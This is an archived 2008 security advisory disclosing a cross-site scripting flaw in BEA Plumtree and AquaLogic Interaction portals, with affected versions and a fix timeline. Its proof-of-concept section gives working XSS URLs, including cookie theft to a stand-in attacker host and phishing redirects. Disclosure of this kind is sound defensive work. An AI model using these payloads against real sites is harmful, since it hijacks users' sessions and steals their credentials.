exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

ProCheckUp Security Advisory 2006.12

ProCheckUp Security Advisory 2006.12
Posted Feb 20, 2008
Authored by Adrian Pastor, ProCheckUp, Jan Fry | Site procheckup.com

BEA Plumtree Foundation portal version 6.0 and BEA AquaLogic Interaction version 6.1 are both vulnerable to a cross site scripting vulnerability.

tags | exploit, xss
SHA-256 | 7a08c7f2e308d21418659bf94d530748edc0e377060fe39dc2ceed70fa329e2a

ProCheckUp Security Advisory 2006.12

Change Mirror Download
PR06-12: XSS on BEA Plumtree Foundation and AquaLogic Interaction portals


Description:

BEA Plumtree Foundation portal 6.0 and BEA AquaLogic Interaction 6.1 are
vulnerable to a XSS vulnerability affecting the 'name' parameter which
is submitted to the '/portal/server.pt' server-side script.

Date found: 12th September 2006

Vendor contacted: 18th May 2007

Successfully tested on: BEA Plumtree Foundation 6.0.1.218452.

BEA Systems have confirmed the following versions to be affected:

BEA Plumtree Foundation 6.0 through service pack 1.
BEA AquaLogic Interaction 6.1 through service pack 1.

BEA Plumtree 5.0J.173033, 5.02, 5.03 and 5.4 are not affected by this issue.


Severity: Medium-High


Authors: Jan Fry and Adrian Pastor of ProCheckUp Ltd (www.procheckup.com)

ProCheckUp thanks BEA Systems for their co-operation.

Proof of concept:

The following requests launch a JavaScript alert box on the user's web
browser, simply to prove that is possible to run scripting code on the
victim's web browser.

Please note that '%22;}%3C/script%3E' is added at the beginning of every
payload in order to make the overall HTML document syntactically
correct, thus increasing the chance of the attack working on different
web browser types:

https://target-domain.foo/portal/server.pt?open=space&name=</SCRIPT><script>alert('CanCrossSiteScript')</script>
https://target-domain.foo/portal/server.pt?open=space&name=%22;}%3C/script%3E%3Cscript%3Ealert('CanCrossSiteScript')%3C/script%3E%3C!--


The following requests allow session hijacking through cookie theft:

https://target-domain.foo/portal/server.pt?open=space&name=</SCRIPT><script>window.location="http://attackers-site.foo/grabber.php?c="%2bdocument.cookie</script>
http://target-domain.foo/portal/server.pt?open=space&name=%22;}%3C/script%3E%3Cscript%3Ewindow.location="http://attackers-site.foo/grabber.php?c="%2bdocument.cookie%3C/script%3E%3C!--

The following requests allow password theft by redirecting to a
third-party 'spoof' site which would perform a phishing attack on the
victim:

https://target-domain.foo/portal/server.pt?open=space&name=</SCRIPT><script>window.location="http://phishers-site.foo"</script>
http://target-domain.foo/portal/server.pt?open=space&name=%22;}%3C/script%3E%3Cscript%3Ewindow.location="http://phishers-site.foo%3C/script%3E%3C!--

HTML injection through this XSS vulnerability is also possible. This
allows advanced phishing attacks by inserting a HTML form within the
context of the victim website.


Consequences:

Scripting code can be run within the security context of the target
site. User accounts can be hijacked. Advanced phishing attacks can be
launched.


Note:

This vulnerability could be considered a medium-high risk (rather than
medium risk) in cases in which admin users are targeted, resulting in
the attacker gaining administrative privileges on the target
Plumtree/AquaLogic Portal.


Fix: this issue will be addressed in the 6.5 release of AquaLogic
Interaction.


References:

"ProCheckUp - Security Vulnerabilities"
http://www.procheckup.com/Vulnerabilities.php

BEA's BEA08-186.00 advisory:

"Security Advisories and Notifications"
http://dev2dev.bea.com/advisoriesnotifications/


Legal:

Copyright 2008 Procheckup Ltd. All rights reserved.

Permission is granted for copying and circulating this Bulletin to the
Internet community for the purpose of alerting them to problems, if and
only if, the Bulletin is not edited or changed in any way, is attributed
to Procheckup, and provided such reproduction and/or distribution is
performed for non-commercial purposes.

Any other use of this information is prohibited. Procheckup is not
liable for any misuse of this information by any third party.
Login or Register to add favorites

File Archive:

July 2022

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jul 1st
    52 Files
  • 2
    Jul 2nd
    0 Files
  • 3
    Jul 3rd
    0 Files
  • 4
    Jul 4th
    0 Files
  • 5
    Jul 5th
    0 Files
  • 6
    Jul 6th
    0 Files
  • 7
    Jul 7th
    0 Files
  • 8
    Jul 8th
    0 Files
  • 9
    Jul 9th
    0 Files
  • 10
    Jul 10th
    0 Files
  • 11
    Jul 11th
    0 Files
  • 12
    Jul 12th
    0 Files
  • 13
    Jul 13th
    0 Files
  • 14
    Jul 14th
    0 Files
  • 15
    Jul 15th
    0 Files
  • 16
    Jul 16th
    0 Files
  • 17
    Jul 17th
    0 Files
  • 18
    Jul 18th
    0 Files
  • 19
    Jul 19th
    0 Files
  • 20
    Jul 20th
    0 Files
  • 21
    Jul 21st
    0 Files
  • 22
    Jul 22nd
    0 Files
  • 23
    Jul 23rd
    0 Files
  • 24
    Jul 24th
    0 Files
  • 25
    Jul 25th
    0 Files
  • 26
    Jul 26th
    0 Files
  • 27
    Jul 27th
    0 Files
  • 28
    Jul 28th
    0 Files
  • 29
    Jul 29th
    0 Files
  • 30
    Jul 30th
    0 Files
  • 31
    Jul 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Hosting By
Rokasec
close